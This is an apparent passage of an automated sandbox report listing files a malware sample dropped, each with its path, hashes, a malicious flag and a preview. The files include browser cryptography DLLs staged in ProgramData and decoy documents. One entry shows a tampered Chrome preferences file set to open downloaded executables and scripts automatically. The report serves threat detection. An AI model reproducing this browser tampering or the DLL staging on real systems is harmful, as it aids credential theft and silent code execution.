Encrypted:	false
SSDEEP:	24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
MD5:	A01E6B89B2F69F2DA25CB28751A6261C
SHA1:	48C11C0BECEB053F3DB16EC43135B20360E77E9B
SHA-256:	0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
SHA-512:	1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
Malicious:	false
Reputation:	unknown
Preview:	QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

C:\ProgramData\UNKRLCVOHV.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Reputation:	unknown
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\ProgramData\UNKRLCVOHV.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Reputation:	unknown
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\ProgramData\VWDFPKGDUF.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696835919052288
Encrypted:	false
SSDEEP:	24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
MD5:	197C0DB71198B230CF6568A2AA40C23B
SHA1:	BAE63DD78D567ED9183C0F8D72A191191745C4E5
SHA-256:	6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
SHA-512:	972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
Malicious:	false
Reputation:	unknown
Preview:	VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\iolo technologies\logs\bootstrap.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	331
Entropy (8bit):	5.222726968982172
Encrypted:	false
SSDEEP:	6:BMKLFyzT1XataAgrCYqyzTxNFmLIYvgBtXWOyzTr+HB1JCHyzfI0XY4eA:foFAaXCYzpmkYvgLXWXTM/B773
MD5:	3347FE2DDE7DC6A2F720FF914861DF05
SHA1:	8CF3AE047CC020D42D5D7A79560CB63412A51641
SHA-256:	A84DAB2F87FFD2BFFEFA267EC213EFFBEBB2830235504A0A12A7E6AB6AABEA12
SHA-512:	7CC2034BD187E9018F316AA051CA8DC305924BDE418A383350DC33062D4FD646FF36741A20BD98B80B0F2CFD0E7A332BFC09622E680E0FE297E8989FE8412B5D
Malicious:	false
Reputation:	unknown
Preview:	Bootstrap LogFile..-----------------..[23/04/2024 11:35:05]: Product System Mechanic Determined From 5488CB36-BE62-4606-B07B-2EE938868BD1..[23/04/2024 11:35:05]: This Brand IOLODEFAULT Not Detected As Installed..[23/04/2024 11:35:05]: No Supported Products Were Detected On This System..[23/04/2024 11:36:17]: Telemetry Data Sent..

C:\ProgramData\iolo\logs\WSComm.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.177469714361768
Encrypted:	false
SSDEEP:	6:qt0TCfk3VotGjZb34L0W2QiloUCs0TCfk3VotGjZb34LOLQiloe:7TXVotgOL0yiv6TXVotgOLJit
MD5:	2679B22403DA71C92A007AA260B3B048
SHA1:	473352929842873A26813761F8CA8F865DB0471F
SHA-256:	0241971A8D817B3CFBC585D90E509D1C4CF8339F05914B28ED63C4CD78960A92
SHA-512:	34AB9AD98B493FC7F32BB86E95CF01AE6DBC76D276274046B5D4502B1AC7936AD5DB48702FCE5D644FC95EBD23ECC0CC7D17E525E6F8B99AD8997771F5D8D469
Malicious:	false
Reputation:	unknown
Preview:	[04/23/24 09:43:20] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/23/24 09:43:20] IsValidCommunication : Result := True...[04/23/24 09:43:34] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/23/24 09:43:35] IsValidCommunication : Result := True...

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	15130
Entropy (8bit):	5.544742646813256
Encrypted:	false
SSDEEP:	384:xVknXBx1kXqKf/pUZNCgVLH2HfCdIrUobHGkkn/9r3J:xmXBx1kXqKf/pUZNCgVLH2Hf+IrUorGX
MD5:	C0759C17471FB74ADB6FB4C4997D5AB5
SHA1:	96234048EA455CEB6C017C469095D466F32A838B
SHA-256:	BA8599CA3F7BD51FA818877BFBD703C91FCF1868C1AA64628A2514A65DC5EC02
SHA-512:	EB4A9E7C76C751FAAEEE5364CF83CA97D8B2572AD0F424403298E64AD99395555ECF565495214137505578CD3CC7F82969E3600EC338F80DD5200372A6CA6A5D
Malicious:	true
Reputation:	unknown
Preview:	{"download":{"directory_upgrade":true,"always_open_pdf_externally":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz:msi"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13340965310875704","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13340965310875704","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, e

C:\Users\user\AppData\Local\Microsoft\ApplicationInsights\b5e0b91a7b27ffd0fb7331dc99b6ec0fb69def5fdbdba1dc9b571f9c0e6c23b8\bzv5mzmo.f5n

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Reputation:	unknown
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
